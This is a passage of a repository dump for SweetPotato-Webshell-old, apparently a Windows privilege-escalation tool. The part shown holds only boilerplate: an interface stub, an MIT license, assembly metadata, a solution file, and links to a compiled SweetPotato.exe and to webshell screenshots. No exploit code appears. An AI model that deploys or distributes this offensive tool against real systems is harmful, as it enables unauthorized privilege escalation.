7 | void Read([Out, MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1)] byte[] pv, uint cb, out uint pcbRead);
8 | void Write([MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1)] byte[] pv, uint cb, out uint pcbWritten);
9 | void Seek(long dlibMove, uint dwOrigin, out long plibNewPosition);
10 | void SetSize(long libNewSize);
11 | void CopyTo(IStream pstm, long cb, out long pcbRead, out long pcbWritten);
12 | void Commit(uint grfCommitFlags);
13 | void Revert();
14 | void LockRegion(long libOffset, long cb, uint dwLockType);
15 | void UnlockRegion(long libOffset, long cb, uint dwLockType);
16 | void Stat(out STATSTG pstatstg, uint grfStatFlag);
17 | void Clone(out IStream ppstm);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2020 CCob
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("SharpPotato")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SharpPotato")]
13 | [assembly: AssemblyCopyright("Copyright © 2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("1bf9c10f-6f89-4520-9d2e-aaf17d17ba5e")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/SweetPotato.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.779
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SweetPotato", "SweetPotato.csproj", "{1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {2BF3BEBF-0E18-43E5-A34F-BC2C9ABDFEDD}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/app.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/bin/Release/SweetPotato.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-old/bin/Release/SweetPotato.exe
--------------------------------------------------------------------------------
/img/cs-old.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/img/cs-old.png
--------------------------------------------------------------------------------
/img/cs-old2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/img/cs-old2.png
--------------------------------------------------------------------------------
/img/webshell-new.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/img/webshell-new.png
--------------------------------------------------------------------------------
/img/webshell-old.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/img/webshell-old.png
--------------------------------------------------------------------------------